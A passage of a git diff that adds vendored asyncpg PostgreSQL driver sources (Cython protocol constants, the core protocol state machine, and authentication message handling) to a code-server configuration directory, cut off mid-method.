uint32_t c1 + uint32_t c2 + int i = 0 + + while True: + c1 = s1[i] + c2 = s2[i] + + if c1 != c2: + c1 = _apg_tolower(c1) + c2 = _apg_tolower(c2) + if c1 != c2: + return c1 - c2 + + if c1 == 0 or c2 == 0: + break + + i += 1 + + return 0 + + +cdef int apg_strcasecmp_char(const char *s1, const char *s2): + cdef: + uint8_t c1 + uint8_t c2 + int i = 0 + + while True: + c1 = s1[i] + c2 = s2[i] + + if c1 != c2: + c1 = _apg_tolower(c1) + c2 = _apg_tolower(c2) + if c1 != c2: + return c1 - c2 + + if c1 == 0 or c2 == 0: + break + + i += 1 + + return 0 + + +cdef inline bint apg_ascii_isspace(Py_UCS4 ch): + return ( + ch == ' ' or + ch == '\n' or + ch == '\r' or + ch == '\t' or + ch == '\v' or + ch == '\f' + ) + + +cdef Py_UCS4 *apg_parse_int32(Py_UCS4 *buf, int32_t *num): + cdef: + Py_UCS4 *p + int32_t n = 0 + int32_t neg = 0 + + if buf[0] == '-': + neg = 1 + buf += 1 + elif buf[0] == '+': + buf += 1 + + p = buf + while p[0] >= '0' and p[0] <= '9': + n = 10 * n - (p[0] - '0') + p += 1 + + if p == buf: + return NULL + + if not neg: + n = -n + + num[0] = n + + return p diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/consts.pxi b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/consts.pxi new file mode 100755 index 0000000..e1f8726 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/consts.pxi @@ -0,0 +1,12 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +DEF _MAXINT32 = 2**31 - 1 +DEF _COPY_BUFFER_SIZE = 524288 +DEF _COPY_SIGNATURE = b"PGCOPY\n\377\r\n\0" +DEF _EXECUTE_MANY_BUF_NUM = 4 +DEF _EXECUTE_MANY_BUF_SIZE = 32768 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/coreproto.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/coreproto.pxd new file mode 100755 index 0000000..34c7c71 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/coreproto.pxd @@ -0,0 +1,192 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +include "scram.pxd" + + +cdef enum ConnectionStatus: + CONNECTION_OK = 1 + CONNECTION_BAD = 2 + CONNECTION_STARTED = 3 # Waiting for connection to be made. + + +cdef enum ProtocolState: + PROTOCOL_IDLE = 0 + + PROTOCOL_FAILED = 1 + PROTOCOL_ERROR_CONSUME = 2 + PROTOCOL_CANCELLED = 3 + PROTOCOL_TERMINATING = 4 + + PROTOCOL_AUTH = 10 + PROTOCOL_PREPARE = 11 + PROTOCOL_BIND_EXECUTE = 12 + PROTOCOL_BIND_EXECUTE_MANY = 13 + PROTOCOL_CLOSE_STMT_PORTAL = 14 + PROTOCOL_SIMPLE_QUERY = 15 + PROTOCOL_EXECUTE = 16 + PROTOCOL_BIND = 17 + PROTOCOL_COPY_OUT = 18 + PROTOCOL_COPY_OUT_DATA = 19 + PROTOCOL_COPY_OUT_DONE = 20 + PROTOCOL_COPY_IN = 21 + PROTOCOL_COPY_IN_DATA = 22 + + +cdef enum AuthenticationMessage: + AUTH_SUCCESSFUL = 0 + AUTH_REQUIRED_KERBEROS = 2 + AUTH_REQUIRED_PASSWORD = 3 + AUTH_REQUIRED_PASSWORDMD5 = 5 + AUTH_REQUIRED_SCMCRED = 6 + AUTH_REQUIRED_GSS = 7 + AUTH_REQUIRED_GSS_CONTINUE = 8 + AUTH_REQUIRED_SSPI = 9 + AUTH_REQUIRED_SASL = 10 + AUTH_SASL_CONTINUE = 11 + AUTH_SASL_FINAL = 12 + + +cdef enum ResultType: + RESULT_OK = 1 + RESULT_FAILED = 2 + + +cdef enum TransactionStatus: + PQTRANS_IDLE = 0 # connection idle + PQTRANS_ACTIVE = 1 # command in progress + PQTRANS_INTRANS = 2 # idle, within transaction block + PQTRANS_INERROR = 3 # idle, within failed transaction + PQTRANS_UNKNOWN = 4 # cannot determine status + + +ctypedef object (*decode_row_method)(object, const char*, ssize_t) + + +cdef class CoreProtocol: + cdef: + ReadBuffer buffer + bint _skip_discard + bint _discard_data + + # executemany support data + object _execute_iter + str _execute_portal_name + str _execute_stmt_name + + ConnectionStatus con_status + ProtocolState state + TransactionStatus xact_status + + str encoding + + object transport + + object address + # Instance of _ConnectionParameters + object con_params + # Instance of SCRAMAuthentication + SCRAMAuthentication scram + # Instance of gssapi.SecurityContext or sspilib.SecurityContext + object gss_ctx + + readonly int32_t backend_pid + readonly int32_t backend_secret + + ## Result + ResultType result_type + object result + bytes result_param_desc + bytes result_row_desc + bytes result_status_msg + + # True - completed, False - suspended + bint result_execute_completed + + cpdef is_in_transaction(self) + cdef _process__auth(self, char mtype) + cdef _process__prepare(self, char mtype) + cdef _process__bind_execute(self, char mtype) + cdef _process__bind_execute_many(self, char mtype) + cdef _process__close_stmt_portal(self, char mtype) + cdef _process__simple_query(self, char mtype) + cdef _process__bind(self, char mtype) + cdef _process__copy_out(self, char mtype) + cdef _process__copy_out_data(self, char mtype) + cdef _process__copy_in(self, char mtype) + cdef _process__copy_in_data(self, char mtype) + + cdef _parse_msg_authentication(self) + cdef _parse_msg_parameter_status(self) + cdef _parse_msg_notification(self) + cdef _parse_msg_backend_key_data(self) + cdef _parse_msg_ready_for_query(self) + cdef _parse_data_msgs(self) + cdef _parse_copy_data_msgs(self) + cdef _parse_msg_error_response(self, is_error) + cdef _parse_msg_command_complete(self) + + cdef _write_copy_data_msg(self, object data) + cdef _write_copy_done_msg(self) + cdef _write_copy_fail_msg(self, str cause) + + cdef _auth_password_message_cleartext(self) + cdef _auth_password_message_md5(self, bytes salt) + cdef _auth_password_message_sasl_initial(self, list sasl_auth_methods) + cdef _auth_password_message_sasl_continue(self, bytes server_response) + cdef _auth_gss_init_gssapi(self) + cdef _auth_gss_init_sspi(self, bint negotiate) + cdef _auth_gss_get_service(self) + cdef _auth_gss_step(self, bytes server_response) + + cdef _write(self, buf) + cdef _writelines(self, list buffers) + + cdef _read_server_messages(self) + + cdef _push_result(self) + cdef _reset_result(self) + cdef _set_state(self, ProtocolState new_state) + + cdef _ensure_connected(self) + + cdef WriteBuffer _build_parse_message(self, str stmt_name, str query) + cdef WriteBuffer _build_bind_message(self, str portal_name, + str stmt_name, + WriteBuffer bind_data) + cdef WriteBuffer _build_empty_bind_data(self) + cdef WriteBuffer _build_execute_message(self, str portal_name, + int32_t limit) + + + cdef _connect(self) + cdef _prepare_and_describe(self, str stmt_name, str query) + cdef _send_parse_message(self, str stmt_name, str query) + cdef _send_bind_message(self, str portal_name, str stmt_name, + WriteBuffer bind_data, int32_t limit) + cdef _bind_execute(self, str portal_name, str stmt_name, + WriteBuffer bind_data, int32_t limit) + cdef bint _bind_execute_many(self, str portal_name, str stmt_name, + object bind_data, bint return_rows) + cdef bint _bind_execute_many_more(self, bint first=*) + cdef _bind_execute_many_fail(self, object error, bint first=*) + cdef _bind(self, str portal_name, str stmt_name, + WriteBuffer bind_data) + cdef _execute(self, str portal_name, int32_t limit) + cdef _close(self, str name, bint is_portal) + cdef _simple_query(self, str query) + cdef _copy_out(self, str copy_stmt) + cdef _copy_in(self, str copy_stmt) + cdef _terminate(self) + + cdef _decode_row(self, const char* buf, ssize_t buf_len) + + cdef _on_result(self) + cdef _on_notification(self, pid, channel, payload) + cdef _on_notice(self, parsed) + cdef _set_server_parameter(self, name, val) + cdef _on_connection_lost(self, exc) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/coreproto.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/coreproto.pyx new file mode 100755 index 0000000..da96c41 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/coreproto.pyx @@ -0,0 +1,1233 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import hashlib + + +include "scram.pyx" + + +AUTH_METHOD_NAME = { + AUTH_REQUIRED_KERBEROS: 'kerberosv5', + AUTH_REQUIRED_PASSWORD: 'password', + AUTH_REQUIRED_PASSWORDMD5: 'md5', + AUTH_REQUIRED_GSS: 'gss', + AUTH_REQUIRED_SASL: 'scram-sha-256', + AUTH_REQUIRED_SSPI: 'sspi', +} + + +cdef class CoreProtocol: + + def __init__(self, addr, con_params): + self.address = addr + # type of `con_params` is `_ConnectionParameters` + self.buffer = ReadBuffer() + self.user = con_params.user + self.password = con_params.password + self.auth_msg = None + self.con_params = con_params + self.con_status = CONNECTION_BAD + self.state = PROTOCOL_IDLE + self.xact_status = PQTRANS_IDLE + self.encoding = 'utf-8' + # type of `scram` is `SCRAMAuthentcation` + self.scram = None + # type of `gss_ctx` is `gssapi.SecurityContext` or + # `sspilib.SecurityContext` + self.gss_ctx = None + + self._reset_result() + + cpdef is_in_transaction(self): + # PQTRANS_INTRANS = idle, within transaction block + # PQTRANS_INERROR = idle, within failed transaction + return self.xact_status in (PQTRANS_INTRANS, PQTRANS_INERROR) + + cdef _read_server_messages(self): + cdef: + char mtype + ProtocolState state + pgproto.take_message_method take_message = \ + self.buffer.take_message + pgproto.get_message_type_method get_message_type= \ + self.buffer.get_message_type + + while take_message(self.buffer) == 1: + mtype = get_message_type(self.buffer) + state = self.state + + try: + if mtype == b'S': + # ParameterStatus + self._parse_msg_parameter_status() + + elif mtype == b'A': + # NotificationResponse + self._parse_msg_notification() + + elif mtype == b'N': + # 'N' - NoticeResponse + self._on_notice(self._parse_msg_error_response(False)) + + elif state == PROTOCOL_AUTH: + self._process__auth(mtype) + + elif state == PROTOCOL_PREPARE: + self._process__prepare(mtype) + + elif state == PROTOCOL_BIND_EXECUTE: + self._process__bind_execute(mtype) + + elif state == PROTOCOL_BIND_EXECUTE_MANY: + self._process__bind_execute_many(mtype) + + elif state == PROTOCOL_EXECUTE: + self._process__bind_execute(mtype) + + elif state == PROTOCOL_BIND: + self._process__bind(mtype) + + elif state == PROTOCOL_CLOSE_STMT_PORTAL: + self._process__close_stmt_portal(mtype) + + elif state == PROTOCOL_SIMPLE_QUERY: + self._process__simple_query(mtype) + + elif state == PROTOCOL_COPY_OUT: + self._process__copy_out(mtype) + + elif (state == PROTOCOL_COPY_OUT_DATA or + state == PROTOCOL_COPY_OUT_DONE): + self._process__copy_out_data(mtype) + + elif state == PROTOCOL_COPY_IN: + self._process__copy_in(mtype) + + elif state == PROTOCOL_COPY_IN_DATA: + self._process__copy_in_data(mtype) + + elif state == PROTOCOL_CANCELLED: + # discard all messages until the sync message + if mtype == b'E': + self._parse_msg_error_response(True) + elif mtype == b'Z': + self._parse_msg_ready_for_query() + self._push_result() + else: + self.buffer.discard_message() + + elif state == PROTOCOL_ERROR_CONSUME: + # Error in protocol (on asyncpg side); + # discard all messages until sync message + + if mtype == b'Z': + # Sync point, self to push the result + if self.result_type != RESULT_FAILED: + self.result_type = RESULT_FAILED + self.result = apg_exc.InternalClientError( + 'unknown error in protocol implementation') + + self._parse_msg_ready_for_query() + self._push_result() + + else: + self.buffer.discard_message() + + elif state == PROTOCOL_TERMINATING: + # The connection is being terminated. + # discard all messages until connection + # termination. + self.buffer.discard_message() + + else: + raise apg_exc.InternalClientError( + f'cannot process message {chr(mtype)!r}: ' + f'protocol is in an unexpected state {state!r}.') + + except Exception as ex: + self.result_type = RESULT_FAILED + self.result = ex + + if mtype == b'Z': + self._push_result() + else: + self.state = PROTOCOL_ERROR_CONSUME + + finally: + self.buffer.finish_message() + + cdef _process__auth(self, char mtype): + if mtype == b'R': + # Authentication... + try: + self._parse_msg_authentication() + except Exception as ex: + # Exception in authentication parsing code + # is usually either malformed authentication data + # or missing support for cryptographic primitives + # in the hashlib module. + self.result_type = RESULT_FAILED + self.result = apg_exc.InternalClientError( + f"unexpected error while performing authentication: {ex}") + self.result.__cause__ = ex + self.con_status = CONNECTION_BAD + self._push_result() + else: + if self.result_type != RESULT_OK: + self.con_status = CONNECTION_BAD + self._push_result() + + elif self.auth_msg is not None: + # Server wants us to send auth data, so do that. + self._write(self.auth_msg) + self.auth_msg = None + + elif mtype == b'K': + # BackendKeyData + self._parse_msg_backend_key_data() + + elif mtype == b'E': + # ErrorResponse + self.con_status = CONNECTION_BAD + self._parse_msg_error_response(True) + self._push_result() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self.con_status = CONNECTION_OK + self._push_result() + + cdef _process__prepare(self, char mtype): + if mtype == b't': + # Parameters description + self.result_param_desc = self.buffer.consume_message() + + elif mtype == b'1': + # ParseComplete + self.buffer.discard_message() + + elif mtype == b'T': + # Row description + self.result_row_desc = self.buffer.consume_message() + self._push_result() + + elif mtype == b'E': + # ErrorResponse + self._parse_msg_error_response(True) + # we don't send a sync during the parse/describe sequence + # but send a FLUSH instead. If an error happens we need to + # send a SYNC explicitly in order to mark the end of the transaction. + # this effectively clears the error and we then wait until we get a + # ready for new query message + self._write(SYNC_MESSAGE) + self.state = PROTOCOL_ERROR_CONSUME + + elif mtype == b'n': + # NoData + self.buffer.discard_message() + self._push_result() + + cdef _process__bind_execute(self, char mtype): + if mtype == b'D': + # DataRow + self._parse_data_msgs() + + elif mtype == b's': + # PortalSuspended + self.buffer.discard_message() + + elif mtype == b'C': + # CommandComplete + self.result_execute_completed = True + self._parse_msg_command_complete() + + elif mtype == b'E': + # ErrorResponse + self._parse_msg_error_response(True) + + elif mtype == b'1': + # ParseComplete, in case `_bind_execute()` is reparsing + self.buffer.discard_message() + + elif mtype == b'2': + # BindComplete + self.buffer.discard_message() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + elif mtype == b'I': + # EmptyQueryResponse + self.buffer.discard_message() + + cdef _process__bind_execute_many(self, char mtype): + cdef WriteBuffer buf + + if mtype == b'D': + # DataRow + self._parse_data_msgs() + + elif mtype == b's': + # PortalSuspended + self.buffer.discard_message() + + elif mtype == b'C': + # CommandComplete + self._parse_msg_command_complete() + + elif mtype == b'E': + # ErrorResponse + self._parse_msg_error_response(True) + + elif mtype == b'1': + # ParseComplete, in case `_bind_execute_many()` is reparsing + self.buffer.discard_message() + + elif mtype == b'2': + # BindComplete + self.buffer.discard_message() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + elif mtype == b'I': + # EmptyQueryResponse + self.buffer.discard_message() + + elif mtype == b'1': + # ParseComplete + self.buffer.discard_message() + + cdef _process__bind(self, char mtype): + if mtype == b'E': + # ErrorResponse + self._parse_msg_error_response(True) + + elif mtype == b'2': + # BindComplete + self.buffer.discard_message() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + cdef _process__close_stmt_portal(self, char mtype): + if mtype == b'E': + # ErrorResponse + self._parse_msg_error_response(True) + + elif mtype == b'3': + # CloseComplete + self.buffer.discard_message() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + cdef _process__simple_query(self, char mtype): + if mtype in {b'D', b'I', b'T'}: + # 'D' - DataRow + # 'I' - EmptyQueryResponse + # 'T' - RowDescription + self.buffer.discard_message() + + elif mtype == b'E': + # ErrorResponse + self._parse_msg_error_response(True) + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + elif mtype == b'C': + # CommandComplete + self._parse_msg_command_complete() + + else: + # We don't really care about COPY IN etc + self.buffer.discard_message() + + cdef _process__copy_out(self, char mtype): + if mtype == b'E': + self._parse_msg_error_response(True) + + elif mtype == b'H': + # CopyOutResponse + self._set_state(PROTOCOL_COPY_OUT_DATA) + self.buffer.discard_message() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + cdef _process__copy_out_data(self, char mtype): + if mtype == b'E': + self._parse_msg_error_response(True) + + elif mtype == b'd': + # CopyData + self._parse_copy_data_msgs() + + elif mtype == b'c': + # CopyDone + self.buffer.discard_message() + self._set_state(PROTOCOL_COPY_OUT_DONE) + + elif mtype == b'C': + # CommandComplete + self._parse_msg_command_complete() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + cdef _process__copy_in(self, char mtype): + if mtype == b'E': + self._parse_msg_error_response(True) + + elif mtype == b'G': + # CopyInResponse + self._set_state(PROTOCOL_COPY_IN_DATA) + self.buffer.discard_message() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + cdef _process__copy_in_data(self, char mtype): + if mtype == b'E': + self._parse_msg_error_response(True) + + elif mtype == b'C': + # CommandComplete + self._parse_msg_command_complete() + + elif mtype == b'Z': + # ReadyForQuery + self._parse_msg_ready_for_query() + self._push_result() + + cdef _parse_msg_command_complete(self): + cdef: + const char* cbuf + ssize_t cbuf_len + + cbuf = self.buffer.try_consume_message(&cbuf_len) + if cbuf != NULL and cbuf_len > 0: + msg = cpython.PyBytes_FromStringAndSize(cbuf, cbuf_len - 1) + else: + msg = self.buffer.read_null_str() + self.result_status_msg = msg + + cdef _parse_copy_data_msgs(self): + cdef: + ReadBuffer buf = self.buffer + + self.result = buf.consume_messages(b'd') + + # By this point we have consumed all CopyData messages + # in the inbound buffer. If there are no messages left + # in the buffer, we need to push the accumulated data + # out to the caller in anticipation of the new CopyData + # batch. If there _are_ non-CopyData messages left, + # we must not push the result here and let the + # _process__copy_out_data subprotocol do the job. + if not buf.take_message(): + self._on_result() + self.result = None + else: + # If there is a message in the buffer, put it back to + # be processed by the next protocol iteration. + buf.put_message() + + cdef _write_copy_data_msg(self, object data): + cdef: + WriteBuffer buf + object mview + Py_buffer *pybuf + + mview = cpythonx.PyMemoryView_GetContiguous( + data, cpython.PyBUF_READ, b'C') + + try: + pybuf = cpythonx.PyMemoryView_GET_BUFFER(mview) + + buf = WriteBuffer.new_message(b'd') + buf.write_cstr(pybuf.buf, pybuf.len) + buf.end_message() + finally: + mview.release() + + self._write(buf) + + cdef _write_copy_done_msg(self): + cdef: + WriteBuffer buf + + buf = WriteBuffer.new_message(b'c') + buf.end_message() + self._write(buf) + + cdef _write_copy_fail_msg(self, str cause): + cdef: + WriteBuffer buf + + buf = WriteBuffer.new_message(b'f') + buf.write_str(cause or '', self.encoding) + buf.end_message() + self._write(buf) + + cdef _parse_data_msgs(self): + cdef: + ReadBuffer buf = self.buffer + list rows + + decode_row_method decoder = self._decode_row + pgproto.try_consume_message_method try_consume_message = \ + buf.try_consume_message + pgproto.take_message_type_method take_message_type = \ + buf.take_message_type + + const char* cbuf + ssize_t cbuf_len + object row + bytes mem + + if PG_DEBUG: + if buf.get_message_type() != b'D': + raise apg_exc.InternalClientError( + '_parse_data_msgs: first message is not "D"') + + if self._discard_data: + while take_message_type(buf, b'D'): + buf.discard_message() + return + + if PG_DEBUG: + if type(self.result) is not list: + raise apg_exc.InternalClientError( + '_parse_data_msgs: result is not a list, but {!r}'. + format(self.result)) + + rows = self.result + while take_message_type(buf, b'D'): + cbuf = try_consume_message(buf, &cbuf_len) + if cbuf != NULL: + row = decoder(self, cbuf, cbuf_len) + else: + mem = buf.consume_message() + row = decoder( + self, + cpython.PyBytes_AS_STRING(mem), + cpython.PyBytes_GET_SIZE(mem)) + + cpython.PyList_Append(rows, row) + + cdef _parse_msg_backend_key_data(self): + self.backend_pid = self.buffer.read_int32() + self.backend_secret = self.buffer.read_int32() + + cdef _parse_msg_parameter_status(self): + name = self.buffer.read_null_str() + name = name.decode(self.encoding) + + val = self.buffer.read_null_str() + val = val.decode(self.encoding) + + self._set_server_parameter(name, val) + + cdef _parse_msg_notification(self): + pid = self.buffer.read_int32() + channel = self.buffer.read_null_str().decode(self.encoding) + payload = self.buffer.read_null_str().decode(self.encoding) + self._on_notification(pid, channel, payload) + + cdef _parse_msg_authentication(self): + cdef: + int32_t status + bytes md5_salt + list sasl_auth_methods + list unsupported_sasl_auth_methods + + status = self.buffer.read_int32() + + if status == AUTH_SUCCESSFUL: + # AuthenticationOk + self.result_type = RESULT_OK + + elif status == AUTH_REQUIRED_PASSWORD: + # AuthenticationCleartextPassword + self.result_type = RESULT_OK + self.auth_msg = self._auth_password_message_cleartext() + + elif status == AUTH_REQUIRED_PASSWORDMD5: + # AuthenticationMD5Password + # Note: MD5 salt is passed as a four-byte sequence + md5_salt = self.buffer.read_bytes(4) + self.auth_msg = self._auth_password_message_md5(md5_salt) + + elif status == AUTH_REQUIRED_SASL: + # AuthenticationSASL + # This requires making additional requests to the server in order + # to follow the SCRAM protocol defined in RFC 5802. + # get the SASL authentication methods that the server is providing + sasl_auth_methods = [] + unsupported_sasl_auth_methods = [] + # determine if the advertised authentication methods are supported, + # and if so, add them to the list + auth_method = self.buffer.read_null_str() + while auth_method: + if auth_method in SCRAMAuthentication.AUTHENTICATION_METHODS: + sasl_auth_methods.append(auth_method) + else: + unsupported_sasl_auth_methods.append(auth_method) + auth_method = self.buffer.read_null_str() + + # if none of the advertised authentication methods are supported, + # raise an error + # otherwise, initialize the SASL authentication exchange + if not sasl_auth_methods: + unsupported_sasl_auth_methods = [m.decode("ascii") + for m in unsupported_sasl_auth_methods] + self.result_type = RESULT_FAILED + self.result = apg_exc.InterfaceError( + 'unsupported SASL Authentication methods requested by the ' + 'server: {!r}'.format( + ", ".join(unsupported_sasl_auth_methods))) + else: + self.auth_msg = self._auth_password_message_sasl_initial( + sasl_auth_methods) + + elif status == AUTH_SASL_CONTINUE: + # AUTH_SASL_CONTINUE + # this requeires sending the second part of the SASL exchange, where + # the client parses information back from the server and determines + # if this is valid. + # The client builds a challenge response to the server + server_response = self.buffer.consume_message() + self.auth_msg = self._auth_password_message_sasl_continue( + server_response) + + elif status == AUTH_SASL_FINAL: + # AUTH_SASL_FINAL + server_response = self.buffer.consume_message() + if not self.scram.verify_server_final_message(server_response): + self.result_type = RESULT_FAILED + self.result = apg_exc.InterfaceError( + 'could not verify server signature for ' + 'SCRAM authentciation: scram-sha-256', + ) + self.scram = None + + elif status in (AUTH_REQUIRED_GSS, AUTH_REQUIRED_SSPI): + # AUTH_REQUIRED_SSPI is the same as AUTH_REQUIRED_GSS, except that + # it uses protocol negotiation with SSPI clients. Both methods use + # AUTH_REQUIRED_GSS_CONTINUE for subsequent authentication steps. + if self.gss_ctx is not None: + self.result_type = RESULT_FAILED + self.result = apg_exc.InterfaceError( + 'duplicate GSSAPI/SSPI authentication request') + else: + if self.con_params.gsslib == 'gssapi': + self._auth_gss_init_gssapi() + else: + self._auth_gss_init_sspi(status == AUTH_REQUIRED_SSPI) + self.auth_msg = self._auth_gss_step(None) + + elif status == AUTH_REQUIRED_GSS_CONTINUE: + server_response = self.buffer.consume_message() + self.auth_msg = self._auth_gss_step(server_response) + + else: + self.result_type = RESULT_FAILED + self.result = apg_exc.InterfaceError( + 'unsupported authentication method requested by the ' + 'server: {!r}'.format(AUTH_METHOD_NAME.get(status, status))) + + if status not in (AUTH_SASL_CONTINUE, AUTH_SASL_FINAL, + AUTH_REQUIRED_GSS_CONTINUE): + self.buffer.discard_message() + + cdef _auth_password_message_cleartext(self): + cdef: + WriteBuffer msg + + msg = WriteBuffer.new_message(b'p') + msg.write_bytestring(self.password.encode(self.encoding)) + msg.end_message() + + return msg + + cdef _auth_password_message_md5(self, bytes salt): + cdef: + WriteBuffer msg + + msg = WriteBuffer.new_message(b'p') + + # 'md5' + md5(md5(password + username) + salt)) + userpass = (self.password or '') + (self.user or '') + md5_1 = hashlib.md5(userpass.encode(self.encoding)).hexdigest() + md5_2 = hashlib.md5(md5_1.encode('ascii') + salt).hexdigest() + + msg.write_bytestring(b'md5' + md5_2.encode('ascii')) + msg.end_message() + + return msg + + cdef _auth_password_message_sasl_initial(self, list sasl_auth_methods): + cdef: + WriteBuffer msg + + # use the first supported advertized mechanism + self.scram = SCRAMAuthentication(sasl_auth_methods[0]) + # this involves a call and response with the server + msg = WriteBuffer.new_message(b'p') + msg.write_bytes(self.scram.create_client_first_message(self.user or '')) + msg.end_message() + + return msg + + cdef _auth_password_message_sasl_continue(self, bytes server_response): + cdef: + WriteBuffer msg + + # determine if there is a valid server response + self.scram.parse_server_first_message(server_response) + # this involves a call and response with the server + msg = WriteBuffer.new_message(b'p') + client_final_message = self.scram.create_client_final_message( + self.password or '') + msg.write_bytes(client_final_message) + msg.end_message() + + return msg + + cdef _auth_gss_init_gssapi(self): + try: + import gssapi + except ModuleNotFoundError: + raise apg_exc.InterfaceError( + 'gssapi module not found; please install asyncpg[gssauth] to ' + 'use asyncpg with Kerberos/GSSAPI/SSPI authentication' + ) from None + + service_name, host = self._auth_gss_get_service() + self.gss_ctx = gssapi.SecurityContext( + name=gssapi.Name( + f'{service_name}@{host}', gssapi.NameType.hostbased_service), + usage='initiate') + + cdef _auth_gss_init_sspi(self, bint negotiate): + try: + import sspilib + except ModuleNotFoundError: + raise apg_exc.InterfaceError( + 'sspilib module not found; please install asyncpg[gssauth] to ' + 'use asyncpg with Kerberos/GSSAPI/SSPI authentication' + ) from None + + service_name, host = self._auth_gss_get_service() + self.gss_ctx = sspilib.ClientSecurityContext( + target_name=f'{service_name}/{host}', + credential=sspilib.UserCredential( + protocol='Negotiate' if negotiate else 'Kerberos')) + + cdef _auth_gss_get_service(self): + service_name = self.con_params.krbsrvname or 'postgres' + if isinstance(self.address, str): + raise apg_exc.InternalClientError( + 'GSSAPI/SSPI authentication is only supported for TCP/IP ' + 'connections') + + return service_name, self.address[0] + + cdef _auth_gss_step(self, bytes server_response): + cdef: + WriteBuffer msg + + token = self.gss_ctx.step(server_response) + if not token: + self.gss_ctx = None + return None + msg = WriteBuffer.new_message(b'p') + msg.write_bytes(token) + msg.end_message() + + return msg + + cdef _parse_msg_ready_for_query(self): + cdef char status = self.buffer.read_byte() + + if status == b'I': + self.xact_status = PQTRANS_IDLE + elif status == b'T': + self.xact_status = PQTRANS_INTRANS + elif status == b'E': + self.xact_status = PQTRANS_INERROR + else: + self.xact_status = PQTRANS_UNKNOWN + + cdef _parse_msg_error_response(self, is_error): + cdef: + char code + bytes message + dict parsed = {} + + while True: + code = self.buffer.read_byte() + if code == 0: + break + + message = self.buffer.read_null_str() + + parsed[chr(code)] = message.decode() + + if is_error: + self.result_type = RESULT_FAILED + self.result = parsed + else: + return parsed + + cdef _push_result(self): + try: + self._on_result() + finally: + self._set_state(PROTOCOL_IDLE) + self._reset_result() + + cdef _reset_result(self): + self.result_type = RESULT_OK + self.result = None + self.result_param_desc = None + self.result_row_desc = None + self.result_status_msg = None + self.result_execute_completed = False + self._discard_data = False + + # executemany support data + self._execute_iter = None + self._execute_portal_name = None + self._execute_stmt_name = None + + cdef _set_state(self, ProtocolState new_state): + if new_state == PROTOCOL_IDLE: + if self.state == PROTOCOL_FAILED: + raise apg_exc.InternalClientError( + 'cannot switch to "idle" state; ' + 'protocol is in the "failed" state') + elif self.state == PROTOCOL_IDLE: + pass + else: + self.state = new_state + + elif new_state == PROTOCOL_FAILED: + self.state = PROTOCOL_FAILED + + elif new_state == PROTOCOL_CANCELLED: + self.state = PROTOCOL_CANCELLED + + elif new_state == PROTOCOL_TERMINATING: + self.state = PROTOCOL_TERMINATING + + else: + if self.state == PROTOCOL_IDLE: + self.state = new_state + + elif (self.state == PROTOCOL_COPY_OUT and + new_state == PROTOCOL_COPY_OUT_DATA): + self.state = new_state + + elif (self.state == PROTOCOL_COPY_OUT_DATA and + new_state == PROTOCOL_COPY_OUT_DONE): + self.state = new_state + + elif (self.state == PROTOCOL_COPY_IN and + new_state == PROTOCOL_COPY_IN_DATA): + self.state = new_state + + elif self.state == PROTOCOL_FAILED: + raise apg_exc.InternalClientError( + 'cannot switch to state {}; ' + 'protocol is in the "failed" state'.format(new_state)) + else: + raise apg_exc.InternalClientError( + 'cannot switch to state {}; ' + 'another operation ({}) is in progress'.format( + new_state, self.state)) + + cdef _ensure_connected(self): + if self.con_status != CONNECTION_OK: + raise apg_exc.InternalClientError('not connected') + + cdef WriteBuffer _build_parse_message(self, str stmt_name, str query): + cdef WriteBuffer buf + + buf = WriteBuffer.new_message(b'P') + buf.write_str(stmt_name, self.encoding) + buf.write_str(query, self.encoding) + buf.write_int16(0) + + buf.end_message() + return buf + + cdef WriteBuffer _build_bind_message(self, str portal_name, + str stmt_name, + WriteBuffer bind_data): + cdef WriteBuffer buf + + buf = WriteBuffer.new_message(b'B') + buf.write_str(portal_name, self.encoding) + buf.write_str(stmt_name, self.encoding) + + # Arguments + buf.write_buffer(bind_data) + + buf.end_message() + return buf + + cdef WriteBuffer _build_empty_bind_data(self): + cdef WriteBuffer buf + buf = WriteBuffer.new() + buf.write_int16(0) # The number of parameter format codes + buf.write_int16(0) # The number of parameter values + buf.write_int16(0) # The number of result-column format codes + return buf + + cdef WriteBuffer _build_execute_message(self, str portal_name, + int32_t limit): + cdef WriteBuffer buf + + buf = WriteBuffer.new_message(b'E') + buf.write_str(portal_name, self.encoding) # name of the portal + buf.write_int32(limit) # number of rows to return; 0 - all + + buf.end_message() + return buf + + # API for subclasses + + cdef _connect(self): + cdef: + WriteBuffer buf + WriteBuffer outbuf + + if self.con_status != CONNECTION_BAD: + raise apg_exc.InternalClientError('already connected') + + self._set_state(PROTOCOL_AUTH) + self.con_status = CONNECTION_STARTED + + # Assemble a startup message + buf = WriteBuffer() + + # protocol version + buf.write_int16(3) + 